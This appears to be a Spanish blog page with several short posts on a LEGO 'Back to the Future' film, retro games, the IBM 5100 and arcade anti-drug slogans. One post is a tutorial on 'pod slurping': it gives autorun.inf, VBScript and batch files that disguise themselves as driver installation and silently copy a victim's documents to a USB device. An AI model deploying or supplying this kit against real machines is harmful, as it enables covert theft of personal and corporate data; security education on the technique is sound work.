La escena del reloj de la torre de ‘Regreso al futuro’ con piezas de LEGO

Ya sabéis que nos encantan por aquí estos vídeos que se convierten en virales y en auténticos memes (sensu stricto) que terminan por recorrer el orbe digital completo en, prácticamente, horas. Y este es especialmente brillante e impresionante.

Es que a eso se dedican los chicos de Macro Lego Universe, a realizar películas o escenas de película con piezas de LEGO, pero con una ambientación tal que resultan emocionantes y extraordinarias. Aunque, por el momento, no dispongan de mucho material.

Rehacer el clímax, repleto de suspense, de la escena del reloj de la torre con minifiguras de LEGO tratando de aprovechar la energía del rayo para regresar al futuro es, simplemente, un éxito sensacional. El corto fue mostrado en la convención de fans de LEGO Brick 2014 y hace un trabajo sorprendentemente eficaz al reproducir el impacto emocional de la escena original, teniendo en cuenta sus “actores” son bastante poco expresivos. Nunca hay que subestimar a una minifig de LEGO…

El vídeo se colgó en el Tubo hace menos de cuatro días y su ascenso está siendo imparable. No te lo pierdas.

[Retropapelote de la semana] ‘Me marcho pa´ Francia 98’

'Me marcho pa´ Francia 98'

‘Me marcho pa´ Francia 98’

Calificado en la prestigiosa web Computer Emuzone como el cuarto peor juego de la historia, la verdad es que es todo un triunfo llegar siquiera a aparecer en sus listas, y el autor de esta aventura gráfica tiene algún que otro juego más por allí empotrado.

Lo que vemos ahí arriba es la carátula del ‘Me marcho pa´ Francia 98‘, una aventura conversacional de distribución amateur programada en 1998 para MS-DOS por Luis Felipe Morales Bendicho (ManoWar), un crack de aquella época que todavía anda dando guerra por ahí con sus andanzas digitales y su Papada Soft.

‘Me marcho pa´ Francia 98’ es una crítica al exseleccionador nacional de fútbol Javier Clemente y al fracaso de la selección española en el mundial de Francia de 1998. En él te metes en el papel de Luis, un muchacho que tiene que ir encontrando una serie de objetos para poder marcharse al mundial de fútbol. Está programado con NMP, un sistema de creación de juegos de tipo aventura conversacional para DOS que actualmente se encuentra obsoleto.

Papada Soft es una compañía española amateur (aunque ha realizado algún proyecto comercial) dedicada a la creación de software de entretenimiento y, en especial, de aventuras conversacionales. Desde 1990 viene desarrollando videojuegos de este tipo, y llegó a conformar un grupo de hasta doce miembros, aunque hoy día sólo su fundador original es el que se encarga de todo el trabajo.

Si el juego es malo, la carátula ni te cuento (teniendo en cuenta que, encima, pone “futbolítica”). De traca, vaya.

Qué es un ataque de ‘pod slurping’ y cómo generarlo

iPod

iPod

El mundo del hacking es apasionante y cada día nos ofrece nuevas técnicas para explotar agujeros de seguridad en los diversos sistemas informáticos. El pod slurping no es nada nuevo, pero por aquí nos encanta porque está diseñado de una manera tan ingeniosa que recuerda a los primitivos virus de macro, que únicamente se servían de las características propias del sistema operativo (y de un poquito de ingeniería social) para acceder hasta la cocina de las entretelas del aparato.

El experto estadounidense en seguridad informática Abe Usher utilizó el término pod slurping por primera vez hace, más o menos, cinco años. Con él describe cómo los reproductores de MP3, tales como el iPod, y otros dispositivos de almacenamiento masivo USB pueden ser utilizados fácilmente para robar información confidencial corporativa en una empresa. Y todo ello de manera muy simple: conectándolo al ordenador víctima y dejándolo actuar, de manera sutil y disimulada.

Para demostrar esta vulnerabilidad en la seguridad de cualquier empresa, Usher desarrolló una prueba de concepto con la ayuda de una aplicación software que podía buscar, automáticamente, información crítica en las redes corporativas para luego copiarla dentro de un iPod de Apple. Esta aplicación corría directamente desde cualquier iPod y, al ser conectada a una computadora, podía copiar grandes volúmenes de información en cuestión de minutos.

Aquí vamos a utilizar nuestro propio software a modo de tutorial.

No hay que mirar muy lejos hacia atrás para encontrar uno de los primeros episodios de robo con este tipo de dispositivos. En febrero del año 2002, sale a la luz una historia relacionada con un iPod que se utiliza con fines ilegales. En este informe se explica que un consultor informático, llamado Kevin Webb, estaba de compras en una de las tiendas que la cadena CompUSA tiene a lo largo y ancho de EE. UU. Deambulaba por la sección de informática, cuando observó a un joven muchacho caminar hacia donde se encontraba él. El chico se acercó hasta la pantalla de un ordenador Macintosh y, en ese momento, sacó un iPod de su bolsillo, conectando su reproductor a la máquina.

Webb, intrigado por los movimientos del adolescente, se acercó por detrás de él para investigar su actividad. Para su sorpresa, el joven estaba copiándose el nuevo Office de Microsoft para uno de los primeros Mac OS X que, en aquel momento, se vendía por aproximadamente 500 dólares americanos. Se quedó observando un poco más y fue capaz de ver a este chico recopilar algunas otras aplicaciones de software más.

Asombrado por lo que acababa de presenciar, inmediatamente se acercó a un empleado para informar de lo que acababa de ocurrir, pero simplemente recibió una expresión de despiste e ignorancia por respuesta.

Desde aquel incidente se han podido recopilar muchos casos más de robo de información con el solo hecho de conectar un dispositivo USB a un ordenador, de manera subrepticia y sin que prácticamente nadie se dé cuenta. Hasta que, como hemos ya comentado, surgió la locución pod slurping, aludiendo al iPod por ser el primer dispositivo del que se tiene constancia que ha sido utilizado para esta técnica de intrusión y, también, al término anglosajón ‘slurp’ (‘sorber’ o ‘sorbo’).

Vamos ahora a la sección práctica, a ver cómo podemos explotar esta vulnerabilidad. Lo haremos sobre sistemas Windows, pues con otros que necesitan del montaje de las unidades de disco al conectarlas, podría ser un proceso algo más complicado, aunque nunca imposible. El famoso programita de Abe Usher no era otra cosa que una secuencia de comandos en Python que contenía los argumentos y atributos necesarios para llevar a cabo esta técnica en un ordenador con sistema operativo Windows.

La mayoría de los sistemas Windows tienen varias utilidades de línea de comandos integradas que podrían realizar muy fácilmente las tareas de “absorción” de información. El comando xcopy, por ejemplo, es uno de ellos y se puede encontrar hasta Windows Vista. Esta utilidad incluye cierta sintaxis muy básica y puede ofrecernos unas amplias posibilidades de éxito, algo que vamos a demostrar a continuación.

Para nuestro ejemplo necesitamos un equipo con Windows XP o Vista (cualquier versión) y, para ser fieles al origen del término pod slurping, un iPod de Apple (podemos utilizar cualquier otro medio extraíble USB). Las siguientes instrucciones describen cómo hacer uso del comando xcopy y las características de Windows para construir un dispositivo de slurping muy fácilmente.

Paso 1. Abrimos un editor de texto y escribimos las líneas siguientes para, posteriormente, guardarlas en un archivo al que llamaremos autorun.inf. Este archivo en Windows es el que se encarga de lanzar determinadas acciones o aplicaciones cuando se introduce un medio externo de almacenamiento (como ejecutar una instalación al meter un cederrón, por ejemplo).

[autorun]
open=launch.bat
action=Instalar drivers de la unidad flash USB
label=Unidad flash USB
shell\open\command=start.bat
'AutoPlay' en Windows Vista

‘AutoPlay’ en Windows Vista

Este archivito especifica que, al introducir nuestro USB en un equipo, va a lanzar automáticamente el archivo de proceso por lotes llamado start.bat (que luego crearemos). Además, incluye un pequeño engaño, medio ingeniería social, medio phishing: esos textos tras los atributos action y label especifican los literales que van a aparecer en el ‘Explorador de archivos’ y, también, en el cuadro de diálogo ‘Reproducción automática’ (‘AutoPlay‘), ese que se arranca al conectar nuestro dispositivo. Es decir, si alguien nos espía por detrás, va a creer que lo que hacemos es instalar los controladores del dispositivo.

Paso 2. Abrimos otro archivo de texto, escribimos la línea siguiente y lo guardamos como start.bat, el archivo de procesamiento por lotes mencionado antes.

wscript.exe "%~d0\script.vbs" "bkup.bat"

Este fichero batch ejecuta el motor de scripts Windows Script Host enviándole como argumento un archivo de script (script.vbs) que se encuentra en la unidad introducida y un archivo de proceso por lotes (bkup.bat) que es, a la vez, argumento del anterior. Ambos archivos los creamos a continuación.

Paso 3. En otro archivo de texto más escribimos lo que sigue y lo almacenamos como script.vbs, es decir un archivo de script en lenguaje VBScript y que interpreta directamente el motor Windows Script Host.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Esta línea crea el objeto de Windows Scripting Host en memoria para ejecutar un programa que le pasamos como argumento o parámetro.

Paso 4. Un último archivo deberá contener las líneas siguientes, las que se corresponden con el último batch que es, realmente, el que realiza todo el proceso de pod slurping. Lo llamaremos bkup.bat.

@echo off
mkdir %~d0\%computername%
xcopy "C:\Documents and Settings\%username%\Mis Documentos"
%~d0\%computername% /s/c/q/r/h
xcopy C:\Users\%username%\Documentos %~d0\%computername% /s/c/q/r/h/g
@cls
@exit

Este último fichero crea un directorio en nuestro dispositivo USB con el nombre del equipo al que está conectado y, a continuación, copia (mediante el comando xcopy y varios parámetros modificadores) todos los documentos del usuario de Windows XP (primer xcopy) o Windows Vista (segundo xcopy) al directorio generado.

Paso 5. Y, por fin, copiamos estos cuatro archivos a nuestro iPod o USB preferido, al directorio raíz. Listo, ya tenemos nuestro dispositivo de pod slurping preparado. ¡Sólo queda probarlo!

'xcopy' equiscopiando a todo trapo

‘xcopy’ equiscopiando a todo trapo

Y luego ya sólo es cuestión de echarle imaginación, ingenio y fantasía. Por ejemplo, a partir de Windows Vista, disponíamos, a través del Kit de Recursos de Windows, del nuevo comando robocopy (o copia robusta). Esta herramienta proporciona una plétora de nuevas características de copia que incluyen capacidades para el sistema de archivos NTFS, atributos extendidos, opción de reinicio y muchas otras. Además, a partir de Windows 7, robocopy también incluye características de copia multihilo (multithreading), pues antes sólo podía realizar la copia de los archivos en orden consecutivo.

Hoy día, además, con la irrupción masiva de los teléfonos inteligentes, las aplicaciones de este ataque cada vez se vuelven más elaboradas y complejas. Pero, ¿existe alguna manera de evitarlo? Un empleado puede aparentar estar escuchando música en su iPod pero, en realidad, podría estar cargando archivos maliciosos o absorbiendo gigabytes de información valiosa para la empresa.

Una posible solución para evitar el robo de información es implementar políticas de control para el almacenamiento móvil en toda la empresa. Algunos expertos sugieren acciones convencionales como el bloqueo físico o lógico de puertos (algo muy sencillo para cualquier administrador de sistemas); otros plantean acciones más drásticas, como la prohibición del uso de este tipo de dispositivos en los lugares de trabajo. Nos sirvamos de una filosofía u otra, este no es el mejor camino que podemos tomar.

La manera ideal de asegurar el control completo sobre los dispositivos de almacenamiento portátil es mediante la introducción de barreras tecnológicas, tales como soluciones de software que permitan un control total sobre las transferencias de datos hacia y desde dispositivos de almacenamiento móvil por cada usuario en la red.

Sea como fuere, y cómo solemos decir desde estas trincheras digitales, no se pueden poner puertas al campo, y la explotación de los agujeros de seguridad de los distintos sistemas operativos seguirá siendo un hecho mañana y pasado mañana. La cuestión pasa por poner a prueba nuestra capacidad tecnológica y nuestros conocimientos para conseguir retos intelectuales cada vez más complejos e inasequibles. Ese es el desafío, porque robar información es un delito.

[Retropapelote de la semana] IBM 5100, a cualquier cosa le llamaban portátil

Publicidad del IBM 5100

Publicidad del IBM 5100

En septiembre de 1975, IBM anunció su primera y más pequeña computadora portátil (si es que los 28 kilos que pesaba se pueden considerar como algo “portátil”), el IBM 5100, no más grande que una de las máquinas de escribir de IBM de la época.

Desarrollado en Rochester, utilizaba el mismo sistema operativo que la línea de mainframes System/370 de la empresa. Por lo tanto, acomodaba el mismo intérprete APL, y un intérprete de BASIC que también estaba disponible en función del modelo elegido.

Este fue el primer portátil ampliamente comercializado y, sin lugar a dudas, el primer sistema informático all-in-one. Sin embargo, era una máquina muy primitiva que no tuvo éxito debido a su alto precio (la versión básica costaba 8.975 dólares) y a sus capacidades de expansión limitadas.

Tenía una unidad de cinta incorporada y una pequeña pantalla de 5″ y 64 caracteres. La unidad de cinta utilizaba un cartucho DC300 de 1/4 de pulgada y era capaz de almacenar 204 KB de datos. El 5100 no contaba con un chip microprocesador, en su lugar montaba una tarjeta llamada PALM (Put All Logic in Microcode) que actuaba como un microprocesador de 16 bits.

“Winners Don’t Use Drugs”: retromorriña videojueguil

¡Alto ahí, FBI!

¡Alto ahí, FBI!

Los que gastamos nuestra paga íntegra en las maquinitas (de cinco duros en cinco duros) desde mediados de los ochenta hasta finales de los noventa, pudimos comprobar como hubo un tiempo en el que los videojuegos nos instaban a evitar el consumo de drogas, porque aquello era cosa de perdedores, no de winners digitales. Esto ocurrió, concretamente, desde el año 1989 hasta el año 2000.

El eslogan que se puede ver en la foto siguiente, firmado por el director del FBI del momento y con el sello circular de la agencia encabezando la imagen, formaba parte de la campaña “Just Say No” del FBI diseñada para evitar que niños y adolescentes se inmiscuyeran en temas de drogas, alcohol, sexo recreativo, violencia y otros asuntos de adultos. El lema “Winners Don’t Use Drugs” (“los ganadores no utilizan drogas”) y la propia campaña fueron diseñados por William S. Sessions, director del FBI norteamericano entre 1987 y 1993.

Winners don't use drugs

Winners don’t use drugs

A raíz, pues, de esta maniobra, se aprobó una ley, en acuerdo entre el FBI y Robert Fay, el director de la American Amusement Machine Association (la asociación de maquinitas varias de entretenimiento), con la cual se decretó que todos los juegos de arcade que salieran de EE. UU. mostraran esta advertencia. Hasta 20 fabricantes de arcades, y algún que otro de máquinas de petacos (pinballs), tuvieron que incluir el mensaje en sus productos entre 1989 y 2000.

William S. Sessions

William S. Sessions

La imagen se podía ver durante el llamado attract mode de los videojuegos, esto es, el modo aquel de ilustración en el que se proyectaban partidas de demostración pregrabadas para atraer a los jugadores y transeúntes de la zona. El lema hizo su debut oficial el 10 de enero de 1989, cuando se mostraron a la prensa tres grandes juegos de la época que lo incluían.

Para los nostálgicos de los videojuegos de aquel período es una imagen que ha quedado grabada a sangre y fuego en nuestras memorias. Hoy día se puede encontrar diverso merchandising de carácter retro con el dibujo estampado, sobre todo camisetas.

Lo curioso es que no fue la única campaña que terminó anunciándose en los videojuegos de arcade ochenteros y noventeros. Desde 1992 hasta el año 2000, otra iniciativa, en este caso ecológica, que llevaba como lema “Trashing it is completely uncool” (algo así como “ensuciarlo es completamente muy poco guay”) e impulsada por la USEPA y la AAMA, pretendía plantar guerra a la contaminación. Su logotipo también inundó las máquinas de arcade durante aquella década.

Reciclando ando

Reciclando ando

El lema de las drogas a dado lugar a muchas parodias desde aquella época hasta el momento actual. La última de la que tenemos constancia está incluida en el juego ‘Scott Pilgrim contra el mundo: El videojuego‘ (‘Scott Pilgrim vs. The World: The Game’) para Xbox y PlayStation, donde aparece el mensaje “Winners Don’t Eat Meat” (“los ganadores con comen carne”). También aparece en la serie de animación ‘Futurama‘, en este caso con la versión “Winners Don’t Play Videogames” (los ganadores no juegan a videojuegos), rizando el rizo de una forma muy ingeniosa.

Winners don't play videogames

Winners don’t play videogames

40 de 120«...102030...3839404142...506070...»
eBook ‘retroPLOF!’

retroPLOF!

Especifica tu dirección de correo electrónico y pulsa 'Comprar ahora'. Puedes pagar con tu cuenta de PayPal o con cualquier tarjeta bancaria.

E-mail envío eBook:

Sigue teknoPLOF! vía…
 
RSS
Twitter
Facebook
Google
 
Ready Set Click!

Utilizamos cookies propias y de terceros para mejorar la experiencia de navegación. Más información.

ACEPTAR
Aviso de cookies